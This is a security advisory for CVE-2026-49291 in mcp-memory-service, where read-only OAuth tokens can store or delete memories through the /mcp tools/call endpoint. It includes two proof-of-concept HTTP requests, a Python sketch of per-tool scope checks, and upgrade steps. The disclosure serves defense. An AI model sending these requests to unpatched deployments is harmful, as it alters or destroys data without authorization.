high · 8.1 · CVE-2026-49291 · Jun 26, 2026

CVE-2026-49291: mcp-memory-service Missing Authorization on MCP tools/call

Shubham Kandhare
Security Engagement Manager, SecureLayer7

A read-only OAuth token can write or delete memories through the MCP JSON-RPC endpoint, bypassing the write-scope checks that protect the equivalent REST API routes.

Package: mcp-memory-service
Ecosystem: pip
Affected: <= 10.65.1
Fixed in: 10.65.3

The problem

The HTTP MCP endpoint at /mcp was decorated with only require_read_access. When a tools/call request arrived, the handler extracted the tool name and arguments and called handle_tool_call(storage, tool_name, arguments) without forwarding the authenticated user or checking a per-tool required scope.

The MCP tool registry exposed both read and write tools behind that single read-scoped gate. store_memory and delete_memory were reachable with only a read token, while the matching REST endpoints (POST /api/memories, DELETE /api/memories/:hash) correctly used require_write_access and returned 403 for the same token.

Proof of concept

```http
POST /mcp
Authorization: Bearer <read-only-oauth-token>
Content-Type: application/json

{
  "jsonrpc": "2.0",
  "id": 1,
  "method": "tools/call",
  "params": {
    "name": "store_memory",
    "arguments": {
      "content": "mcp read scope stored this",
      "tags": ["poc"]
    }
  }
}
```

To delete an existing memory with the same read-only token:

```http
POST /mcp
Authorization: Bearer <read-only-oauth-token>
Content-Type: application/json

{
  "jsonrpc": "2.0",
  "id": 2,
  "method": "tools/call",
  "params": {
    "name": "delete_memory",
    "arguments": {"content_hash": "<known_hash>"}
  }
}
```

The root cause is a missing per-tool authorization check at tools/call dispatch time (CWE-862). The mcp_endpoint dependency only validated that the caller held any valid OAuth token with read scope. It never consulted a tool-to-scope mapping before invoking the handler, so the scope boundary enforced on the REST layer simply did not exist on the MCP layer.

The patch in PR #1004 (v10.65.3) introduced per-tool scope enforcement inside the tools/call dispatch path. Mutating tools (store_memory, delete_memory, and related write operations) now require the caller to hold write scope, and the check fires before the handler reaches storage.

A read-only token now receives a scope error at the MCP layer, matching the behavior already present on the REST endpoints.
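A sketch of per-tool scope enforcement at tools/call dispatch, added here as an illustration; it is not the code from PR #1004 or from the project. The `TOOL_SCOPES` mapping, the `dispatch_tools_call` and `required_scope` functions, the `retrieve_memory` read tool name and the `-32003` error code are assumptions; `handler` stands in for `handle_tool_call`.

```python
from typing import Any, Callable

# Assumed tool-to-scope mapping. store_memory and delete_memory are the
# mutating tools named in the advisory; retrieve_memory is a hypothetical read tool.
TOOL_SCOPES = {
    "retrieve_memory": "read",
    "store_memory": "write",
    "delete_memory": "write",
}

INVALID_PARAMS = -32602  # standard JSON-RPC 2.0 "Invalid params"
FORBIDDEN = -32003       # assumed code from the server-defined JSON-RPC range


def required_scope(tool_name: str) -> str:
    # Fail closed: a tool missing from the mapping is treated as mutating,
    # so a newly registered write tool is never reachable with read scope.
    return TOOL_SCOPES.get(tool_name, "write")


def _error(request: dict, code: int, message: str) -> dict:
    return {"jsonrpc": "2.0", "id": request.get("id"),
            "error": {"code": code, "message": message}}


def dispatch_tools_call(request: dict, token_scopes: set[str],
                        handler: Callable[[str, dict], Any]) -> dict:
    """Authorize the named tool against the caller's scopes before the
    handler (and therefore storage) is reached."""
    params = request.get("params")
    if not isinstance(params, dict) or not isinstance(params.get("name"), str):
        return _error(request, INVALID_PARAMS, "missing tool name")
    tool_name = params["name"]
    needed = required_scope(tool_name)
    if needed not in token_scopes:
        return _error(request, FORBIDDEN,
                      f"tool {tool_name!r} requires {needed} scope")
    result = handler(tool_name, params.get("arguments") or {})
    return {"jsonrpc": "2.0", "id": request.get("id"), "result": result}


if __name__ == "__main__":
    # Constructed request mirroring the store_memory call in the proof of concept.
    req = {"jsonrpc": "2.0", "id": 1, "method": "tools/call",
           "params": {"name": "store_memory", "arguments": {"content": "x"}}}
    print(dispatch_tools_call(req, {"read"}, lambda n, a: {"ok": True}))
    print(dispatch_tools_call(req, {"read", "write"}, lambda n, a: {"ok": True}))
```

The default in `required_scope` is the part that matters for regression: the gate stays closed for any tool that is registered without an explicit scope entry.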

The fix

Upgrade mcp-memory-service to 10.65.3 or later (pip install --upgrade mcp-memory-service). The fix adds per-tool scope checks inside the tools/call dispatch in src/mcp_memory_service/web/api/mcp.py (PR #1004). No configuration changes are required after upgrading.

If you cannot upgrade immediately, disable OAuth read-only clients or restrict /mcp to write-scoped tokens at your reverse proxy.

Reporter not attributed.
